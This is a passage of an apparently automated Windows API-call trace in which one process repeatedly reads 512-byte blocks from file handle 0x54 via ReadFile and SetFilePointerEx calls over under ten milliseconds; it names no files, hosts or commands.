lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.739] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.740] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.741] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.742] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.743] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.744] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 